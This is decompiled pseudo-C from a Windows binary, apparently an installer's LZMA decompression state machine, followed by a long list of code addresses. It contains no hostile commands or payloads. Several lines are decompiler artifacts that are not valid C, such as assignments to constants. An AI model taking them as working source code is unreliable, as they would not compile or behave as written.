                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							_t534 =  *( *(_t614 - 0x70));
                                                          							if(_t534 > 0xe1) {
                                                          								goto L171;
                                                          							}
                                                          							_t538 = _t534 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t570);
                                                          							_push(9);
                                                          							_pop(_t571);
                                                          							_t610 = _t538 / _t570;
                                                          							_t540 = _t538 % _t570 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t605 = _t540 % _t571 & 0x000000ff;
                                                          							 *(_t614 - 0x3c) = _t605;
                                                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                          								L10:
                                                          								if(_t613 == 0) {
                                                          									L12:
                                                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                          									goto L15;
                                                          								} else {
                                                          									goto L11;
                                                          								}
                                                          								do {
                                                          									L11:
                                                          									_t613 = _t613 - 1;
                                                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                          								} while (_t613 != 0);
                                                          								goto L12;
                                                          							}
                                                          							if( *(_t614 - 4) != 0) {
                                                          								GlobalFree( *(_t614 - 4));
                                                          							}
                                                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          							 *(_t614 - 4) = _t534;
                                                          							if(_t534 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                          								goto L10;
                                                          							}
                                                          						case 1:
                                                          							L13:
                                                          							__eflags =  *(_t614 - 0x6c);
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 1;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							_t45 = _t614 - 0x48;
                                                          							 *_t45 =  *(_t614 - 0x48) + 1;
                                                          							__eflags =  *_t45;
                                                          							L15:
                                                          							if( *(_t614 - 0x48) < 4) {
                                                          								goto L13;
                                                          							}
                                                          							_t546 =  *(_t614 - 0x40);
                                                          							if(_t546 ==  *(_t614 - 0x74)) {
                                                          								L20:
                                                          								 *(_t614 - 0x48) = 5;
                                                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                          								goto L23;
                                                          							}
                                                          							 *(_t614 - 0x74) = _t546;
                                                          							if( *(_t614 - 8) != 0) {
                                                          								GlobalFree( *(_t614 - 8));
                                                          							}
                                                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                          							 *(_t614 - 8) = _t534;
                                                          							if(_t534 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								goto L20;
                                                          							}
                                                          						case 2:
                                                          							L24:
                                                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                          							 *(_t614 - 0x84) = 6;
                                                          							 *(_t614 - 0x4c) = _t553;
                                                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                          							goto L132;
                                                          						case 3:
                                                          							L21:
                                                          							__eflags =  *(_t614 - 0x6c);
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 3;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							_t67 = _t614 - 0x70;
                                                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                          							__eflags =  *_t67;
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                          							L23:
                                                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                          							if( *(_t614 - 0x48) != 0) {
                                                          								goto L21;
                                                          							}
                                                          							goto L24;
                                                          						case 4:
                                                          							goto L133;
                                                          						case 5:
                                                          							goto L137;
                                                          						case 6:
                                                          							goto L0;
                                                          						case 7:
                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                          							if( *(__ebp - 0x40) != 1) {
                                                          								__eax =  *(__ebp - 0x24);
                                                          								 *(__ebp - 0x80) = 0x16;
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x28);
                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          								__eax = 0;
                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                          								__eflags = __eax;
                                                          								 *(__ebp - 0x58) = __eax;
                                                          								goto L68;
                                                          							}
                                                          							__eax =  *(__ebp - 4);
                                                          							__ecx =  *(__ebp - 0x38);
                                                          							 *(__ebp - 0x84) = 8;
                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          							goto L132;
                                                          						case 8:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xa;
                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x38);
                                                          								__ecx =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                          								 *(__ebp - 0x84) = 9;
                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          							}
                                                          							goto L132;
                                                          						case 9:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								goto L89;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x60);
                                                          							if( *(__ebp - 0x60) == 0) {
                                                          								goto L171;
                                                          							}
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          							__eflags = _t258;
                                                          							0 | _t258 = _t258 + _t258 + 9;
                                                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          							goto L75;
                                                          						case 0xa:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xb;
                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x28);
                                                          							goto L88;
                                                          						case 0xb:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__ecx =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x20);
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x24);
                                                          							}
                                                          							__ecx =  *(__ebp - 0x28);
                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          							L88:
                                                          							__ecx =  *(__ebp - 0x2c);
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          							L89:
                                                          							__eax =  *(__ebp - 4);
                                                          							 *(__ebp - 0x80) = 0x15;
                                                          							__eax =  *(__ebp - 4) + 0xa68;
                                                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          							goto L68;
                                                          						case 0xc:
                                                          							L99:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xc;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t334 = __ebp - 0x70;
                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t334;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							__eax =  *(__ebp - 0x2c);
                                                          							goto L101;
                                                          						case 0xd:
                                                          							goto L36;
                                                          						case 0xe:
                                                          							goto L45;
                                                          						case 0xf:
                                                          							goto L57;
                                                          						case 0x10:
                                                          							L109:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x10;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t365 = __ebp - 0x70;
                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t365;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							goto L111;
                                                          						case 0x11:
                                                          							L68:
                                                          							__esi =  *(__ebp - 0x58);
                                                          							 *(__ebp - 0x84) = 0x12;
                                                          							goto L132;
                                                          						case 0x12:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 0x58);
                                                          								 *(__ebp - 0x84) = 0x13;
                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							__eflags = __eax;
                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          							goto L130;
                                                          						case 0x13:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								_t469 = __ebp - 0x58;
                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          								__eflags =  *_t469;
                                                          								 *(__ebp - 0x30) = 0x10;
                                                          								 *(__ebp - 0x40) = 8;
                                                          								L144:
                                                          								 *(__ebp - 0x7c) = 0x14;
                                                          								goto L145;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							 *(__ebp - 0x30) = 8;
                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          							L130:
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							 *(__ebp - 0x40) = 3;
                                                          							goto L144;
                                                          						case 0x14:
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          							__eax =  *(__ebp - 0x80);
                                                          							goto L140;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L120;
                                                          						case 0x16:
                                                          							__eax =  *(__ebp - 0x30);
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx =  *(__ebp - 4);
                                                          							 *(__ebp - 0x40) = 6;
                                                          							__eax = __eax << 7;
                                                          							 *(__ebp - 0x7c) = 0x19;
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							goto L145;
                                                          						case 0x17:
                                                          							L145:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							 *(__ebp - 0x50) = 1;
                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          							goto L149;
                                                          						case 0x18:
                                                          							L146:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x18;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t484 = __ebp - 0x70;
                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t484;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L148:
                                                          							_t487 = __ebp - 0x48;
                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                          							__eflags =  *_t487;
                                                          							L149:
                                                          							__eflags =  *(__ebp - 0x48);
                                                          							if( *(__ebp - 0x48) <= 0) {
                                                          								__ecx =  *(__ebp - 0x40);
                                                          								__ebx =  *(__ebp - 0x50);
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          								__eax =  *(__ebp - 0x7c);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								goto L140;
                                                          							}
                                                          							__eax =  *(__ebp - 0x50);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__esi = __edx + __eax;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								 *(__ebp - 0x50) = __edx;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L148;
                                                          							} else {
                                                          								goto L146;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
                                                          								 *(__ebp - 0x2c) = __ebx;
                                                          								L119:
                                                          								_t393 = __ebp - 0x2c;
                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          								__eflags =  *_t393;
                                                          								L120:
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          									goto L170;
                                                          								}
                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                          									goto L171;
                                                          								}
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          								__eax =  *(__ebp - 0x30);
                                                          								_t400 = __ebp - 0x60;
                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          								__eflags =  *_t400;
                                                          								goto L123;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								 *(__ebp - 0x48) = __ecx;
                                                          								L102:
                                                          								__eflags =  *(__ebp - 0x48);
                                                          								if( *(__ebp - 0x48) <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									 *(__ebp - 0x40) = 4;
                                                          									 *(__ebp - 0x2c) = __eax;
                                                          									__eax =  *(__ebp - 4);
                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                          									__eflags = __eax;
                                                          									L108:
                                                          									__ebx = 0;
                                                          									 *(__ebp - 0x58) = __eax;
                                                          									 *(__ebp - 0x50) = 1;
                                                          									 *(__ebp - 0x44) = 0;
                                                          									 *(__ebp - 0x48) = 0;
                                                          									L112:
                                                          									__eax =  *(__ebp - 0x40);
                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          										_t391 = __ebp - 0x2c;
                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          										__eflags =  *_t391;
                                                          										goto L119;
                                                          									}
                                                          									__eax =  *(__ebp - 0x50);
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          									__eax =  *(__ebp - 0x58);
                                                          									__esi = __edi + __eax;
                                                          									 *(__ebp - 0x54) = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                          										__ecx = 0;
                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          										__ecx = 1;
                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          										__ebx = 1;
                                                          										__ecx =  *(__ebp - 0x48);
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx =  *(__ebp - 0x44);
                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										 *__esi = __ax;
                                                          										 *(__ebp - 0x50) = __edi;
                                                          									} else {
                                                          										 *(__ebp - 0x10) = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                          										L111:
                                                          										_t368 = __ebp - 0x48;
                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                          										__eflags =  *_t368;
                                                          										goto L112;
                                                          									} else {
                                                          										goto L109;
                                                          									}
                                                          								}
                                                          								__ecx =  *(__ebp - 0xc);
                                                          								__ebx = __ebx + __ebx;
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          									__ecx =  *(__ebp - 0x10);
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									 *(__ebp - 0x44) = __ebx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									L101:
                                                          									_t338 = __ebp - 0x48;
                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                          									__eflags =  *_t338;
                                                          									goto L102;
                                                          								} else {
                                                          									goto L99;
                                                          								}
                                                          							}
                                                          							__edx =  *(__ebp - 4);
                                                          							__eax = __eax - __ebx;
                                                          							 *(__ebp - 0x40) = __ecx;
                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          							goto L108;
                                                          						case 0x1a:
                                                          							goto L55;
                                                          						case 0x1b:
                                                          							L75:
                                                          							__eflags =  *(__ebp - 0x64);
                                                          							if( *(__ebp - 0x64) == 0) {
                                                          								 *(__ebp - 0x88) = 0x1b;
                                                          								goto L170;
                                                          							}
                                                          							__eax =  *(__ebp - 0x14);
                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          							__eflags = __eax -  *(__ebp - 0x74);
                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                          								__eflags = __eax;
                                                          							}
                                                          							__edx =  *(__ebp - 8);
                                                          							__cl =  *(__eax + __edx);
                                                          							__eax =  *(__ebp - 0x14);
                                                          							 *(__ebp - 0x5c) = __cl;
                                                          							 *(__eax + __edx) = __cl;
                                                          							__eax = __eax + 1;
                                                          							__edx = 0;
                                                          							_t274 = __eax %  *(__ebp - 0x74);
                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                          							__edx = _t274;
                                                          							__eax =  *(__ebp - 0x68);
                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          							_t283 = __ebp - 0x64;
                                                          							 *_t283 =  *(__ebp - 0x64) - 1;
                                                          							__eflags =  *_t283;
                                                          							 *( *(__ebp - 0x68)) = __cl;
                                                          							goto L79;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L123:
                                                          								__eflags =  *(__ebp - 0x64);
                                                          								if( *(__ebp - 0x64) == 0) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx =  *(__ebp - 8);
                                                          								__cl =  *(__eax + __edx);
                                                          								__eax =  *(__ebp - 0x14);
                                                          								 *(__ebp - 0x5c) = __cl;
                                                          								 *(__eax + __edx) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                          								__edx = _t414;
                                                          								__eax =  *(__ebp - 0x68);
                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          								__eflags =  *(__ebp - 0x30);
                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                          								 *(__ebp - 0x14) = __edx;
                                                          								if( *(__ebp - 0x30) > 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L80;
                                                          								}
                                                          							}
                                                          							 *(__ebp - 0x88) = 0x1c;
                                                          							goto L170;
                                                          					}
                                                          				}
                                                          			}













                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061f7
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f
                                                          0x00406291
                                                          0x00406291
                                                          0x00406291
                                                          0x0040642e
                                                          0x0040642e
                                                          0x00406431
                                                          0x00406431
                                                          0x00000000
                                                          0x00406431
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004061d0
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00406909
                                                          0x00406911
                                                          0x00406918
                                                          0x0040691a
                                                          0x00406921
                                                          0x00406925
                                                          0x00406925
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00000000
                                                          0x0040613e
                                                          0x004061ca
                                                          0x004060d3
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f10
                                                          0x0040691e
                                                          0x0040691e
                                                          0x00000000
                                                          0x0040691e
                                                          0x00405f16
                                                          0x00000000
                                                          0x00405f21
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f2a
                                                          0x00405f2d
                                                          0x00405f30
                                                          0x00405f34
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f3a
                                                          0x00405f3d
                                                          0x00405f3f
                                                          0x00405f40
                                                          0x00405f43
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f48
                                                          0x00405f4b
                                                          0x00405f50
                                                          0x00405f55
                                                          0x00405f5e
                                                          0x00405f71
                                                          0x00405f74
                                                          0x00405f80
                                                          0x00405fa8
                                                          0x00405faa
                                                          0x00405fb8
                                                          0x00405fb8
                                                          0x00405fbc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405fac
                                                          0x00405faf
                                                          0x00405fb0
                                                          0x00405fb0
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405f86
                                                          0x00405f8b
                                                          0x00405f8b
                                                          0x00405f94
                                                          0x00405f9c
                                                          0x00405f9f
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fc2
                                                          0x00405fc2
                                                          0x00405fc6
                                                          0x00406872
                                                          0x00000000
                                                          0x00406872
                                                          0x00405fcf
                                                          0x00405fdf
                                                          0x00405fe2
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe8
                                                          0x00405fec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fee
                                                          0x00405ff4
                                                          0x0040601e
                                                          0x00406024
                                                          0x0040602b
                                                          0x00000000
                                                          0x0040602b
                                                          0x00405ffa
                                                          0x00405ffd
                                                          0x00406002
                                                          0x00406002
                                                          0x0040600d
                                                          0x00406015
                                                          0x00406018
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040605d
                                                          0x00406063
                                                          0x00406066
                                                          0x00406073
                                                          0x0040607b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406032
                                                          0x00406032
                                                          0x00406036
                                                          0x00406881
                                                          0x00000000
                                                          0x00406881
                                                          0x00406042
                                                          0x0040604d
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406050
                                                          0x00406053
                                                          0x00406056
                                                          0x0040605b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
